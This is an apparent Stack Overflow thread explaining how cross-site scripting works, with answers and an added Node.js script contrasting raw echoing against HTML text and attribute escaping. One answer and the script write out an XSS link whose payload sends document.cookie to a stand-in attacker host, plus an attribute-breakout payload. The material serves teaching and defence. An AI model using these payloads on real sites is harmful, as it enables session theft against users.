views: 781
answers: 5
+2  Q: 

How does XSS work?

Can someone explain how XSS works in plain English? Maybe with an example. Googling didn't help much.

+2  A: 

This Wikipedia entry was easy enough.

gimel
+2  A: 

Cross-site scripting is basically a security vulnerability of dynamic web pages where an attacker can create a malicious link to inject unwanted executable JavaScript into a web site. The most common case of this vulnerability occurs when GET variables are printed or echoed without filtering or checking their content.

When a victim clicks the link, the malicious code can then send the victim's cookie away to another server, or it can modify the affected site, injecting forms to steal usernames and passwords, or use other phishing techniques.

Example of a malicious link:

http://VulnerableHost/a.php?variable=<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi%3Fdata='+document.cookie</script>

It's also common to encode the malicious code, for example in hex:

Malicious Link

CMS
It's a good thing SO is filtering that! :P
Bob Somers
Haha yes, this is a good example of proper escaping. Nice job Stack Overflow! :)
Jason
+1  A: 

I'd consider Google Ads (or any other ad platform) as an example of XSS, although probably not deemed an 'attack' if it's intended by the website author.

Ady
+3  A: 

An XSS vulnerability exists whenever a string from outside your application can be interpreted as code.

For example, if you're generating HTML by doing this:

<BODY>
  <?= $myQueryParameter ?>
</BODY>

then if the $myQueryParameter variable contains a <SCRIPT> tag then it will end up executing code.

To prevent an input from being executed as code, you need to escape content properly.

The above problem can be solved by realizing that the $myQueryParameter variable contains plain text, but you can't just go and put plain text into HTML and expect it to work.

So you need to convert plain text to HTML so you can put it into your HTML page. That process of converting a string in one language to another so that it can be embedded is escaping.

You can escape plain text to HTML with a function like:

// Convert plain text to HTML text content: drop NUL bytes, then escape the
// three characters that mean something in HTML, '&' first so it is not re-escaped.
// Every replacement must be global; a bare />/ would only escape the first '>'.
function escapePlainTextToHTML(plainText) {
  return plainText.replace(/\0/g, '').replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
Mike Samuel
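
Putting the two answers above together, as an added example that is not code from either answer: a small Node.js script that renders the a.php?variable= page from the earlier answer both by echoing the value raw, as <?= $myQueryParameter ?> does, and after converting it to HTML with an escaper of the same shape as escapePlainTextToHTML. It also goes one step beyond the text: the same value reflected into a quoted attribute needs the quote characters escaped too, otherwise the attacker closes the attribute and adds an event handler without ever typing a '<'. The function names, the search-form markup, the payload strings and the containsLiveScript check are constructed for this example.

```javascript
// Added example, not code from the answers above. Function names are hypothetical.

// Escaper for the HTML text context (element content). Same idea as
// escapePlainTextToHTML: strip NULs, then escape '&' first, then '<' and '>'.
function escapeHtmlText(plainText) {
  return String(plainText)
    .replace(/\0/g, '')
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Escaper for a quoted attribute value. The quotes must be neutralised as
// well, or the attacker can close the attribute and append an event handler.
function escapeHtmlAttr(plainText) {
  return escapeHtmlText(plainText)
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Constructed sample input: the decoded ?variable= value a server would see
// for the malicious link in the earlier answer.
const PAYLOAD =
  "<script>document.location='http://AttackersHost/cgi-bin/cookie.cgi?data='+document.cookie</script>";

// Vulnerable: exactly what `<?= $myQueryParameter ?>` does.
function renderUnsafe(variable) {
  return `<BODY>\n  ${variable}\n</BODY>`;
}

// Hardened: the value is converted from plain text to HTML before insertion.
function renderSafe(variable) {
  return `<BODY>\n  ${escapeHtmlText(variable)}\n</BODY>`;
}

// Constructed sample input for the attribute context: no '<' anywhere, so a
// text-only escaper leaves it untouched.
const ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="';

// A search form reflecting the query into value="..." (hypothetical markup).
function renderInputTextEscaped(value) {
  return `<input type="text" name="q" value="${escapeHtmlText(value)}">`;
}

function renderInputAttrEscaped(value) {
  return `<input type="text" name="q" value="${escapeHtmlAttr(value)}">`;
}

// Crude check for the demonstration only: a raw <script start tag, or a raw
// quote followed by an on*= handler (an attribute that broke out of its value).
// A real assertion of safety needs an HTML parser, not a regex.
function containsLiveScript(html) {
  return /<script\b/i.test(html) || /"\s+on\w+\s*=/i.test(html);
}

console.log('--- raw echo (vulnerable) ---\n' + renderUnsafe(PAYLOAD));
console.log('--- text-escaped (safe) ---\n' + renderSafe(PAYLOAD));
console.log('--- attribute, text escaping only (still vulnerable) ---\n' + renderInputTextEscaped(ATTR_PAYLOAD));
console.log('--- attribute, attribute escaping (safe) ---\n' + renderInputAttrEscaped(ATTR_PAYLOAD));
```

Run it with node and compare the four outputs: the first and third still contain live script, the second and fourth contain only inert text. The practical rule this illustrates is that the escaper must match the context the value lands in (text, attribute, URL, JavaScript string), and "escape for HTML" by itself means the text context only.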
+1  A: 

A good resource on possible XSS techniques for injecting scripts. It can be useful for testing your site against some of these:

http://ha.ckers.org/xss.html

Jason